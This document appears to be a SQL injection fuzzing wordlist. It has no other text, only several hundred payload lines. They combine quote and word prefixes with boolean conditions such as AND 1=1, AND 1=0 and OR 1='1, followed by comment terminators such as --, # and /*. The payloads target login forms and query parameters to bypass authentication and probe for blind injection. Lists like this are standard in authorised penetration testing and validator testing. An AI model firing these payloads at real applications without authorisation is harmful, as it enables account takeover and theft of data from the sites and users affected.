 AND 1=1 --
 AND 1=0 --
 AND 1=1 -- -;
 AND 1=0 -- -;
 AND 1=1 -- -
 AND 1=0 -- -
 AND 1=1 #
 AND 1=0 #
 AND 1=1 ;
 AND 1=0 ;
 AND 1=1 ;#
 AND 1=0 ;#
 AND 1=1 /*
 AND 1=0 /*
' AND 1=1 --
' AND 1=0 --
' AND 1=1 -- -;
' AND 1=0 -- -;
' AND 1=1 -- -
' AND 1=0 -- -
' AND 1=1 #
' AND 1=0 #
' AND 1=1 ;
' AND 1=0 ;
' AND 1=1 ;#
' AND 1=0 ;#
' AND 1=1 /*
' AND 1=0 /*
" AND 1=1 --
" AND 1=0 --
" AND 1=1 -- -;
" AND 1=0 -- -;
" AND 1=1 -- -
" AND 1=0 -- -
" AND 1=1 #
" AND 1=0 #
" AND 1=1 ;
" AND 1=0 ;
" AND 1=1 ;#
" AND 1=0 ;#
" AND 1=1 /*
" AND 1=0 /*
a" AND 1=1 --
a" AND 1=0 --
a" AND 1=1 -- -;
a" AND 1=0 -- -;
a" AND 1=1 -- -
a" AND 1=0 -- -
a" AND 1=1 #
a" AND 1=0 #
a" AND 1=1 ;
a" AND 1=0 ;
a" AND 1=1 ;#
a" AND 1=0 ;#
a" AND 1=1 /*
a" AND 1=0 /*
a' AND 1=1 --
a' AND 1=0 --
a' AND 1=1 -- -;
a' AND 1=0 -- -;
a' AND 1=1 -- -
a' AND 1=0 -- -
a' AND 1=1 #
a' AND 1=0 #
a' AND 1=1 ;
a' AND 1=0 ;
a' AND 1=1 ;#
a' AND 1=0 ;#
a' AND 1=1 /*
a' AND 1=0 /*
test AND 1=1 --
test AND 1=0 --
test AND 1=1 -- -;
test AND 1=0 -- -;
test AND 1=1 -- -
test AND 1=0 -- -
test AND 1=1 #
test AND 1=0 #
test AND 1=1 ;
test AND 1=0 ;
test AND 1=1 ;#
test AND 1=0 ;#
test AND 1=1 /*
test AND 1=0 /*
user" AND 1=1 --
user" AND 1=0 --
user" AND 1=1 -- -;
user" AND 1=0 -- -;
user" AND 1=1 -- -
user" AND 1=0 -- -
user" AND 1=1 #
user" AND 1=0 #
user" AND 1=1 ;
user" AND 1=0 ;
user" AND 1=1 ;#
user" AND 1=0 ;#
user" AND 1=1 /*
user" AND 1=0 /*
user' AND 1=1 --
user' AND 1=0 --
user' AND 1=1 -- -;
user' AND 1=0 -- -;
user' AND 1=1 -- -
user' AND 1=0 -- -
user' AND 1=1 #
user' AND 1=0 #
user' AND 1=1 ;
user' AND 1=0 ;
user' AND 1=1 ;#
user' AND 1=0 ;#
user' AND 1=1 /*
user' AND 1=0 /*
user AND 1=1 --
user AND 1=0 --
user AND 1=1 -- -;
user AND 1=0 -- -;
user AND 1=1 -- -
user AND 1=0 -- -
user AND 1=1 #
user AND 1=0 #
user AND 1=1 ;
user AND 1=0 ;
user AND 1=1 ;#
user AND 1=0 ;#
user AND 1=1 /*
user AND 1=0 /*
 AND 1='1 --
 AND 1='0 --
 AND 1='1 -- -;
 AND 1='0 -- -;
 AND 1='1 -- -
 AND 1='0 -- -
 AND 1='1 #
 AND 1='0 #
 AND 1='1 ;
 AND 1='0 ;
 AND 1='1 ;#
 AND 1='0 ;#
 AND 1='1 /*
 AND 1='0 /*
' AND 1='1 --
' AND 1='0 --
' AND 1='1 -- -;
' AND 1='0 -- -;
' AND 1='1 -- -
' AND 1='0 -- -
' AND 1='1 #
' AND 1='0 #
' AND 1='1 ;
' AND 1='0 ;
' AND 1='1 ;#
' AND 1='0 ;#
' AND 1='1 /*
' AND 1='0 /*
" AND 1='1 --
" AND 1='0 --
" AND 1='1 -- -;
" AND 1='0 -- -;
" AND 1='1 -- -
" AND 1='0 -- -
" AND 1='1 #
" AND 1='0 #
" AND 1='1 ;
" AND 1='0 ;
" AND 1='1 ;#
" AND 1='0 ;#
" AND 1='1 /*
" AND 1='0 /*
a" AND 1='1 --
a" AND 1='0 --
a" AND 1='1 -- -;
a" AND 1='0 -- -;
a" AND 1='1 -- -
a" AND 1='0 -- -
a" AND 1='1 #
a" AND 1='0 #
a" AND 1='1 ;
a" AND 1='0 ;
a" AND 1='1 ;#
a" AND 1='0 ;#
a" AND 1='1 /*
a" AND 1='0 /*
a' AND 1='1 --
a' AND 1='0 --
a' AND 1='1 -- -;
a' AND 1='0 -- -;
a' AND 1='1 -- -
a' AND 1='0 -- -
a' AND 1='1 #
a' AND 1='0 #
a' AND 1='1 ;
a' AND 1='0 ;
a' AND 1='1 ;#
a' AND 1='0 ;#
a' AND 1='1 /*
a' AND 1='0 /*
test AND 1='1 --
test AND 1='0 --
test AND 1='1 -- -;
test AND 1='0 -- -;
test AND 1='1 -- -
test AND 1='0 -- -
test AND 1='1 #
test AND 1='0 #
test AND 1='1 ;
test AND 1='0 ;
test AND 1='1 ;#
test AND 1='0 ;#
test AND 1='1 /*
test AND 1='0 /*
user" AND 1='1 --
user" AND 1='0 --
user" AND 1='1 -- -;
user" AND 1='0 -- -;
user" AND 1='1 -- -
user" AND 1='0 -- -
user" AND 1='1 #
user" AND 1='0 #
user" AND 1='1 ;
user" AND 1='0 ;
user" AND 1='1 ;#
user" AND 1='0 ;#
user" AND 1='1 /*
user" AND 1='0 /*
user' AND 1='1 --
user' AND 1='0 --
user' AND 1='1 -- -;
user' AND 1='0 -- -;
user' AND 1='1 -- -
user' AND 1='0 -- -
user' AND 1='1 #
user' AND 1='0 #
user' AND 1='1 ;
user' AND 1='0 ;
user' AND 1='1 ;#
user' AND 1='0 ;#
user' AND 1='1 /*
user' AND 1='0 /*
user AND 1='1 --
user AND 1='0 --
user AND 1='1 -- -;
user AND 1='0 -- -;
user AND 1='1 -- -
user AND 1='0 -- -
user AND 1='1 #
user AND 1='0 #
user AND 1='1 ;
user AND 1='0 ;
user AND 1='1 ;#
user AND 1='0 ;#
user AND 1='1 /*
user AND 1='0 /*
 AND 1="1 --
 AND 1="0 --
 AND 1="1 -- -;
 AND 1="0 -- -;
 AND 1="1 -- -
 AND 1="0 -- -
 AND 1="1 #
 AND 1="0 #
 AND 1="1 ;
 AND 1="0 ;
 AND 1="1 ;#
 AND 1="0 ;#
 AND 1="1 /*
 AND 1="0 /*
' AND 1="1 --
' AND 1="0 --
' AND 1="1 -- -;
' AND 1="0 -- -;
' AND 1="1 -- -
' AND 1="0 -- -
' AND 1="1 #
' AND 1="0 #
' AND 1="1 ;
' AND 1="0 ;
' AND 1="1 ;#
' AND 1="0 ;#
' AND 1="1 /*
' AND 1="0 /*
" AND 1="1 --
" AND 1="0 --
" AND 1="1 -- -;
" AND 1="0 -- -;
" AND 1="1 -- -
" AND 1="0 -- -
" AND 1="1 #
" AND 1="0 #
" AND 1="1 ;
" AND 1="0 ;
" AND 1="1 ;#
" AND 1="0 ;#
" AND 1="1 /*
" AND 1="0 /*
a" AND 1="1 --
a" AND 1="0 --
a" AND 1="1 -- -;
a" AND 1="0 -- -;
a" AND 1="1 -- -
a" AND 1="0 -- -
a" AND 1="1 #
a" AND 1="0 #
a" AND 1="1 ;
a" AND 1="0 ;
a" AND 1="1 ;#
a" AND 1="0 ;#
a" AND 1="1 /*
a" AND 1="0 /*
a' AND 1="1 --
a' AND 1="0 --
a' AND 1="1 -- -;
a' AND 1="0 -- -;
a' AND 1="1 -- -
a' AND 1="0 -- -
a' AND 1="1 #
a' AND 1="0 #
a' AND 1="1 ;
a' AND 1="0 ;
a' AND 1="1 ;#
a' AND 1="0 ;#
a' AND 1="1 /*
a' AND 1="0 /*
test AND 1="1 --
test AND 1="0 --
test AND 1="1 -- -;
test AND 1="0 -- -;
test AND 1="1 -- -
test AND 1="0 -- -
test AND 1="1 #
test AND 1="0 #
test AND 1="1 ;
test AND 1="0 ;
test AND 1="1 ;#
test AND 1="0 ;#
test AND 1="1 /*
test AND 1="0 /*
user" AND 1="1 --
user" AND 1="0 --
user" AND 1="1 -- -;
user" AND 1="0 -- -;
user" AND 1="1 -- -
user" AND 1="0 -- -
user" AND 1="1 #
user" AND 1="0 #
user" AND 1="1 ;
user" AND 1="0 ;
user" AND 1="1 ;#
user" AND 1="0 ;#
user" AND 1="1 /*
user" AND 1="0 /*
user' AND 1="1 --
user' AND 1="0 --
user' AND 1="1 -- -;
user' AND 1="0 -- -;
user' AND 1="1 -- -
user' AND 1="0 -- -
user' AND 1="1 #
user' AND 1="0 #
user' AND 1="1 ;
user' AND 1="0 ;
user' AND 1="1 ;#
user' AND 1="0 ;#
user' AND 1="1 /*
user' AND 1="0 /*
user AND 1="1 --
user AND 1="0 --
user AND 1="1 -- -;
user AND 1="0 -- -;
user AND 1="1 -- -
user AND 1="0 -- -
user AND 1="1 #
user AND 1="0 #
user AND 1="1 ;
user AND 1="0 ;
user AND 1="1 ;#
user AND 1="0 ;#
user AND 1="1 /*
user AND 1="0 /*
 OR 1='1 --
 OR 1='0 --
 OR 1='1 -- -;
 OR 1='0 -- -;
 OR 1='1 -- -
 OR 1='0 -- -
 OR 1='1 #
 OR 1='0 #
 OR 1='1 ;
 OR 1='0 ;
 OR 1='1 ;#
 OR 1='0 ;#
 OR 1='1 /*
 OR 1='0 /*
' OR 1='1 --
' OR 1='0 --
' OR 1='1 -- -;
' OR 1='0 -- -;
' OR 1='1 -- -
' OR 1='0 -- -
' OR 1='1 #
' OR 1='0 #
' OR 1='1 ;
' OR 1='0 ;
' OR 1='1 ;#
' OR 1='0 ;#
' OR 1='1 /*
' OR 1='0 /*
" OR 1='1 --
" OR 1='0 --
" OR 1='1 -- -;
" OR 1='0 -- -;
" OR 1='1 -- -
" OR 1='0 -- -
" OR 1='1 #
" OR 1='0 #
" OR 1='1 ;
" OR 1='0 ;
" OR 1='1 ;#
" OR 1='0 ;#
" OR 1='1 /*
" OR 1='0 /*
a" OR 1='1 --
a" OR 1='0 --
a" OR 1='1 -- -;
a" OR 1='0 -- -;
a" OR 1='1 -- -
a" OR 1='0 -- -
a" OR 1='1 #
a" OR 1='0 #
a" OR 1='1 ;
a" OR 1='0 ;
a" OR 1='1 ;#
a" OR 1='0 ;#
a" OR 1='1 /*
a" OR 1='0 /*
a' OR 1='1 --
a' OR 1='0 --
a' OR 1='1 -- -;
a' OR 1='0 -- -;
a' OR 1='1 -- -
a' OR 1='0 -- -
a' OR 1='1 #
a' OR 1='0 #
a' OR 1='1 ;
a' OR 1='0 ;
a' OR 1='1 ;#
a' OR 1='0 ;#
a' OR 1='1 /*
a' OR 1='0 /*
test OR 1='1 --
test OR 1='0 --
test OR 1='1 -- -;
test OR 1='0 -- -;
test OR 1='1 -- -
test OR 1='0 -- -
test OR 1='1 #
test OR 1='0 #
test OR 1='1 ;
test OR 1='0 ;
test OR 1='1 ;#
test OR 1='0 ;#
test OR 1='1 /*
test OR 1='0 /*
user" OR 1='1 --
user" OR 1='0 --
user" OR 1='1 -- -;
user" OR 1='0 -- -;
user" OR 1='1 -- -
user" OR 1='0 -- -
user" OR 1='1 #
user" OR 1='0 #
user" OR 1='1 ;
user" OR 1='0 ;
user" OR 1='1 ;#
user" OR 1='0 ;#
user" OR 1='1 /*
user" OR 1='0 /*
user' OR 1='1 --
user' OR 1='0 --
user' OR 1='1 -- -;
user' OR 1='0 -- -;
user' OR 1='1 -- -
user' OR 1='0 -- -
user' OR 1='1 #
user' OR 1='0 #
user' OR 1='1 ;
user' OR 1='0 ;
user' OR 1='1 ;#
user' OR 1='0 ;#
user' OR 1='1 /*
user' OR 1='0 /*
user OR 1='1 --
user OR 1='0 --
user OR 1='1 -- -;
user OR 1='0 -- -;
user OR 1='1 -- -
user OR 1='0 -- -
user OR 1='1 #
user OR 1='0 #
user OR 1='1 ;
user OR 1='0 ;
user OR 1='1 ;#
user OR 1='0 ;#
user OR 1='1 /*
user OR 1='0 /*